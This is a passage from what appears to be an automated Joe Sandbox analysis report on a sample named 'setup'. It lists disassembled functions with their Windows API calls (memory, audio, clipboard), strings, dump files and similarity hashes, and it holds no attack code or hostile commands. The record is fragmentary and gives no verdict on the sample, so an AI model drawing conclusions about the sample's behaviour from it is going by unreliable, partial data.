                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,00247FDA), ref: 00250B5F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 0f58149fc94f4e8497deffca0a7cb8bbb71613da082478167e3ace467bd43298
                                                                                                    • Instruction ID: 4496899e0ca44326e65e9a4051b5322187e7053106bc8043fd274906ec036787
                                                                                                    • Opcode Fuzzy Hash: 0f58149fc94f4e8497deffca0a7cb8bbb71613da082478167e3ace467bd43298
                                                                                                    • Instruction Fuzzy Hash: D1C08CF29002008BCB007F7CA9896183BA0BA00302F8905B8CC0082012FA30D22C866B
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2803490479-0
                                                                                                    • Opcode ID: 865da496a32c0d936a4ac3c81cea354c12ddad346f6b43016498e3beafc7b5b7
                                                                                                    • Instruction ID: 95c63af6932bebd8ee76f064bf4be9e7df1de08c998cb23fa64e494276e46bd4
                                                                                                    • Opcode Fuzzy Hash: 865da496a32c0d936a4ac3c81cea354c12ddad346f6b43016498e3beafc7b5b7
                                                                                                    • Instruction Fuzzy Hash: 7C5191B8A193028FD715FF64E48462ABBE0FF95304F05895DE8888F765E7709894CF92
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2803490479-0
                                                                                                    • Opcode ID: 50acd2fb010fe8d4c2b84514cdadb0a643eb2c9abb926ca0f6f3912b182815b4
                                                                                                    • Instruction ID: c8e4207dd290265636818a232149e5b074579414a6323bb3ca0ac52279557f94
                                                                                                    • Opcode Fuzzy Hash: 50acd2fb010fe8d4c2b84514cdadb0a643eb2c9abb926ca0f6f3912b182815b4
                                                                                                    • Instruction Fuzzy Hash: 3C31F2B46193028FD711BF64D88061ABBE0FF59344F45896CD9888B356E77484948F92
                                                                                                    APIs
                                                                                                      • Part of subcall function 0032DE40: malloc.MSVCRT ref: 0032DE4E
                                                                                                    • malloc.MSVCRT ref: 00330638
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2803490479-0
                                                                                                    • Opcode ID: f9ab24f192edd79ce3ea07eade3b78986314e03939d49864827d1bf53f1ce981
                                                                                                    • Instruction ID: 3c3ed4eae9af1a774b76c665960ae2377b7688973f33e4bae8f87100b46991f8
                                                                                                    • Opcode Fuzzy Hash: f9ab24f192edd79ce3ea07eade3b78986314e03939d49864827d1bf53f1ce981
                                                                                                    • Instruction Fuzzy Hash: D521F4F441A7118EC3027F60E59622EBAE0EF52749F429C2CE1C94F652DB7880948F9B
                                                                                                    APIs
                                                                                                      • Part of subcall function 0032DE40: malloc.MSVCRT ref: 0032DE4E
                                                                                                    • malloc.MSVCRT ref: 00330638
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2803490479-0
                                                                                                    • Opcode ID: d43de5a8da00e8f38dd807cd5bb60936b0ee8fc76a35b4bd2a2ca8944df7caca
                                                                                                    • Instruction ID: 113bcfb8e222a40c85626169dd2a9796e937e0fe5ce34b8b3c9ee5f237fcd7f9
                                                                                                    • Opcode Fuzzy Hash: d43de5a8da00e8f38dd807cd5bb60936b0ee8fc76a35b4bd2a2ca8944df7caca
                                                                                                    • Instruction Fuzzy Hash: CE1134F481A3018EC3027F60E59622EBAE0FF52348F469C1CE1C94F252DB7880948F9B
                                                                                                    APIs
                                                                                                      • Part of subcall function 00215731: EnterCriticalSection.KERNEL32(00357D30,0023BDFF,?,00000000,00000000,?,?,0023C461,0023C74F,00000003,00000010,0023C74F,00000010,BASS/2.4,00000000), ref: 00215736
                                                                                                    • ceil.MSVCRT ref: 0023732A
                                                                                                    • ceil.MSVCRT ref: 00237377
                                                                                                    • ceil.MSVCRT ref: 002373BD
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 002373D3
                                                                                                      • Part of subcall function 0021573D: LeaveCriticalSection.KERNEL32(00357D30,0023BE3D,?,00000000,00000000,?,?,0023C461,0023C74F,00000003,00000010,0023C74F,00000010,BASS/2.4,00000000), ref: 00215742
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ceil$CriticalSection$CreateEnterEventLeave
                                                                                                    • String ID: \\.\sysaudio
                                                                                                    • API String ID: 217412056-4248085100
                                                                                                    • Opcode ID: 2861e557f4fe3598e371ee5e2d6fd02bc3b5d9274205084b4dd0ab9cfa55c835
                                                                                                    • Instruction ID: 582352de8e3198786b32f70b5b64821acc7cb8da0585106bce5b875291148ef0
                                                                                                    • Opcode Fuzzy Hash: 2861e557f4fe3598e371ee5e2d6fd02bc3b5d9274205084b4dd0ab9cfa55c835
                                                                                                    • Instruction Fuzzy Hash: E6627AF1624346DBDF259F64C889BA93BB8FF44700F20416AFD159A2A2EB70D865CF50
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 39653677-0
                                                                                                    • Opcode ID: 297957ce782c12b8fad21ce20c28c3f28672284d5cd33f8459a4e3a954a50c4a
                                                                                                    • Instruction ID: 008e2fb1e3eb3692c329b774c35fa3f1f1225ab01fa40a33b6e1794d97e0e705
                                                                                                    • Opcode Fuzzy Hash: 297957ce782c12b8fad21ce20c28c3f28672284d5cd33f8459a4e3a954a50c4a
                                                                                                    • Instruction Fuzzy Hash: 960238B15283428FDF18CF28C480365BBE2AF45315F0E86AEDC994B386C7759A5DCB46
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32 ref: 0024FD8C
                                                                                                    • GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0024FDB0
                                                                                                    • GlobalLock.KERNEL32 ref: 0024FDC6
                                                                                                    • MultiByteToWideChar.KERNEL32 ref: 0024FDF6
                                                                                                    • GlobalUnlock.KERNEL32 ref: 0024FDFE
                                                                                                    • OpenClipboard.USER32 ref: 0024FE0F
                                                                                                    • EmptyClipboard.USER32 ref: 0024FE1C
                                                                                                    • SetClipboardData.USER32 ref: 0024FE2D
                                                                                                    Strings
                                                                                                    • Win32: Failed to allocate global handle for clipboard, xrefs: 0024FE70
                                                                                                    • Win32: Failed to open clipboard, xrefs: 0024FE90
                                                                                                    • Win32: Failed to lock global handle, xrefs: 0024FE43
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardGlobal$ByteCharMultiWide$AllocDataEmptyLockOpenUnlock
                                                                                                    • String ID: Win32: Failed to allocate global handle for clipboard$Win32: Failed to lock global handle$Win32: Failed to open clipboard
                                                                                                    • API String ID: 1314454821-415499367
                                                                                                    • Opcode ID: 20276cac415918325ee1d7c6ab3bb3c59f74f334be16c7315d5d6de37bea70f6
                                                                                                    • Instruction ID: f5b743f4d4d3be76f9ccb8a903d909c2ebc3e224f554dabe9e2d5744c96df33d
                                                                                                    • Opcode Fuzzy Hash: 20276cac415918325ee1d7c6ab3bb3c59f74f334be16c7315d5d6de37bea70f6
                                                                                                    • Instruction Fuzzy Hash: B0310AB59193019FD300AF69EA4831ABBE0FB85351F00893EE8C986261D7B58498DB93
                                                                                                    APIs
                                                                                                    • OpenClipboard.USER32 ref: 0024FEAD
                                                                                                    • GetClipboardData.USER32 ref: 0024FEC1
                                                                                                    • GlobalLock.KERNEL32 ref: 0024FED3
                                                                                                    • free.MSVCRT ref: 0024FEEA
                                                                                                      • Part of subcall function 002472B0: WideCharToMultiByte.KERNEL32 ref: 002472FC
                                                                                                      • Part of subcall function 002472B0: calloc.MSVCRT ref: 00247312
                                                                                                      • Part of subcall function 002472B0: WideCharToMultiByte.KERNEL32 ref: 0024734C
                                                                                                    • GlobalUnlock.KERNEL32 ref: 0024FEFF
                                                                                                    • CloseClipboard.USER32 ref: 0024FF08
                                                                                                    • CloseClipboard.USER32 ref: 0024FF54
                                                                                                    • CloseClipboard.USER32 ref: 0024FF74
                                                                                                    Strings
                                                                                                    • Win32: Failed to open clipboard, xrefs: 0024FF20
                                                                                                    • Win32: Failed to lock global handle, xrefs: 0024FF60
                                                                                                    • Win32: Failed to convert clipboard to string, xrefs: 0024FF40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Close$ByteCharGlobalMultiWide$DataLockOpenUnlockcallocfree
                                                                                                    • String ID: Win32: Failed to convert clipboard to string$Win32: Failed to lock global handle$Win32: Failed to open clipboard
                                                                                                    • API String ID: 1311553417-1912854309
                                                                                                    • Opcode ID: 04f167532f9911ef5d69304d758e6a7c9e43fe127739de89c41951541e65603c
                                                                                                    • Instruction ID: 9eb4e144bfe6b3855db1e343e617df2a9e98f0d4e1a6cff907c8c6a3e1c44628
                                                                                                    • Opcode Fuzzy Hash: 04f167532f9911ef5d69304d758e6a7c9e43fe127739de89c41951541e65603c
                                                                                                    • Instruction Fuzzy Hash: 3D214FB45293018FD7417F78EA0921E7AF0AF46341F464839F8C9C7256DBB4C4988BA7
                                                                                                    Strings
                                                                                                    • Invalid window attribute 0x%08X, xrefs: 00246AD4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
